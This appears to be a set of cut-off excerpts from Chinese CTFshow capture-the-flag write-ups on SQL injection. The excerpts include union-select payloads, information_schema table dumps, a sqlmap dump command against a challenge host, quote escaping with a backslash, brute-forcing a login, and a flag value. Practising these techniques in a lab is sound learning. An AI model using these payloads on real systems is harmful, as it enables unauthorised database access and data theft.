web188有过滤的数字型注入//查询语句 //拼接sql语句查找指定ID用户 $sql = "select pass from ctfshow_user where username = {$username}"; //返回逻辑 //用户名检测 if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){ $ret['msg']='...
web171首先尝试1'--+,发现有返回值;说明直接闭合正确;接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来)查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_schema....
sqlmap.py -u http://baab06b2-ebd9-4d00-a361-327d08a8d941.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_user -C pass --dump --headers="Content-Type: text/plain" --cookie="PHPSESSID=8fp1h4ctsl04...
{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","username":"ctfshow","pass":"ctfshow"},{"Tables_in_ctfshow_web":"ctfshow_flagasa"},{"Tables_in_ctfshow_web":"ctfshow_user"}]} 1.payload2: make_payload("select * from ctfshow_flagasa;"){"code...
具体可见新春欢乐赛的web2,本质是通过设置sessionid的值,在通过session_id这个无参函数来获得目标值 648 继续审计user.php function evilClass($m,$k){classctfshow{public$m;publicfunction construct($m){ $this->$m=$m; } } $ctfshow=newctfshow($m); ...
web176 解法一 解法二 web177 web 178 解法一 解法二 web179 解法一 解法二 web180-182 ...
web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,而账户先盲猜admin 抓包使用intruder模块暴力破解 position只要有两个变量就可以 第一个变量-两位小写的英文字母 第二个变量-三位数字 也可以用脚本生成一个字典 import string ...
web646 见web641,已经找到flag ctfshow{5526710eb3ed7b4742232d6d6f9ee3a9} web647 读取的page.php刚开始看到一个传参点,sqlmap跑一下 image-20230805153432337 存在注入 image-20230805153546825 在ctfshow_secret这个表里得到了一个flag image-20230805153703206 得到了key key_is_here_you_know image-20230805153840718 ...
本系列题目来源:CTFSHOW: https://ctf.show/challengessql注入作为常见且危害极大的漏洞,想搞好代码审计,必须将其拿下。故以 CTF 来练习。一、无过滤注入web17
Web234 //分页查询 $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';"; '被过滤了,没有办法闭合,因为存在password和username两个注入点,所以可以使用\逃逸:当password=\时,原来的sql语句就变成: update ctfshow_user set pass = '\' where username = '{$usernam...